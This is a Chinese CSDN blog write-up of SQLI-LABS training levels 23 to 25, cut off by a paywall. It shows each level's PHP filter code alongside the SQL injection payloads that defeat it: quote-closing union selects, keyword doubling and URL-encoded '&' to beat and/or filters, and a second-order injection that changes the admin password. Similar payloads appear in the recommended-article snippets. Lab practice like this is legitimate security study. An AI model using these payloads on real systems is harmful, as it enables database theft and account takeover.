SQLI-LABS 靶场通过小记(23~38)

最新推荐文章于 2024-07-06 18:29:27 发布
最新推荐文章于 2024-07-06 18:29:27 发布
阅读量424 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45736958/article/details/118728031
版权
本文记录了在SQLI-LABS靶场中从Less-23到Less-38的SQL注入攻击及防御方法,包括单引号闭合、逻辑运算注入、查看源码、URL编码绕过、盲注、宽字节注入等技巧,以及针对不同过滤策略的应对策略。
摘要由CSDN通过智能技术生成

23~38

Less-23:
$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);					//获取getid的传参,搜索是否存在注释#,如果存在就用空 来代替,然后重新赋值给GET接受的id
$id = preg_replace($reg1, $replace, $id);					//获取getid的传参,搜索是否存在注释--,如果存在就用空 来代替,然后重新赋值给GET接受的id

image-20210714091932550

1.加单引号让后面闭合
?id=1' and 1=2 union select 1,database(),3'

image-20210714092142025

2.使用逻辑运算注入
?id=1' and 1=2 union select 1,database(),3 or '1=1

image-20210714092316592

Less-24:

通过二次注入修改其他用户的密码

image-20210714092656140

密码:123456

image-20210714092739583

image-20210714092827358

重置密码

新密码为:caocao

image-20210714092933402

修改成功

image-20210714093016827

在本地查看用户名及密码,发现admin用户的密码已经被修改admin' -- qwe用户的密码却没有被修改

image-20210714093216554

Less-25:

通过提示我们不难发现andor都被过滤了

image-20210714093456672

1.查看源码
function blacklist($id)
{
   
        $id= preg_replace('/or/i',"", $id);                     //strip out OR (non case sensitive)//删除OR(不区分大小写)
        $id= preg_replace('/AND/i',"", $id);            //Strip out AND (non case sensitive)//删除AND(不区分大小写)

        return $id;
}

image-20210714093600531

2.双写搭配大小写匹配关键字绕过
?id=1' anANdD 1=2 union select 1,database(),2 -- qwe

image-20210714093832013

3.关键字等价绕过
可以使用&代替and,url编码是%26
?id=1' %26 1
最低0.47元/天 解锁文章
曹振国cc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场练习笔记1-6
m0_47693317的博客
04-27 235
sqli-labs靶场练习笔记1-6 目录Less-1:GET-Error based-Single quotes-String(GET基于报错的单引号字符型注入)Less-2:GET-Error based-Intiger based(GET基于报错的整形注入)Less-3:GET-Error based-Single quote with twist-String(GET基于报错的变形单引号字符型注入)Less-4:GET-Error based-Double Quotes-String(GET基于报错
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 3059
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli.labs靶场23关到28a关)
喜欢创作各种技术类文章,希望可以帮到你
02-01 1252
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
SQLi-Labs靶场通关笔记(1~21关)
最新发布
trdtyvu的博客
07-06 1598
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
SQLI-LABS 靶场通过小记(54~65)
曹振国的博客
07-14 296
54~65Less-54:1.查询数据库2.查询表3.查询字段4.查询数据Less-55:Less-56:Less-57:Less-58:1.报错注入查询库名2.查询表名3.查询字段4.查询数据Less-59:Less-60:Less-61:Less-62:1.判断数据库名的长度2.利用ascii码猜测数据库名Less-63:Less-64:Less-65::cherry_blossom:​完结撒花:cherry_blossom:  ​1~65,堆叠注入和报错注入挺让人头疼的所以我写的比
sqli-labs靶场笔记
qq_33441500的博客
10-20 207
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
Sqli-labs 高级注入篇 (Less23~38)
angry_program的博客
02-02 985
目录 前言 Less-23 过滤注释的显错注入 Less-24 二次注入 Less-25 过滤and和or的显错注入 Less-26 过滤空格和注释符的显错注入 一、空格绕过注入 二、extracvalue函数的显错注入 三、布尔盲注 Less-26a 过滤空格、注释符的布尔盲注 Less-27 过滤联合查询关键字的显错注入 Less-27a 过滤联合查询关键字...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
SQL注入(SQL Injection)是一种常见的网络安全漏洞,主要发生在应用...通过sqli-labs靶场的学习,你可以提升对SQL注入的理解,掌握检测和防护的方法,这对于任何涉及Web开发或网络安全的角色来说都是非常宝贵的技能。
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1340
Sqli-labs 靶场通关学习记录
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5959
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1684
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
SQLI-labs 通关笔记】靶场安装
fyrmaryt的博客
02-27 605
SQLI-labs通关笔记之安装及介绍篇。
sql-lib 1-10关
鸣蜩十四的博客
06-14 664
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2012
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
SQLI-LIBS靶场23-24 #过滤以及二次注入实战
qq_42261604的博客
11-03 267
Less-23 Get型单引号报错注入 输入过滤了-- # 并替代成空,故采用单引号闭合 http://127.0.0.1/sql/Less-23/?id=1' and 1='1 直接搜索已知的数据,成功 http://127.0.0.1/sql/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) and 1='1 Le...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值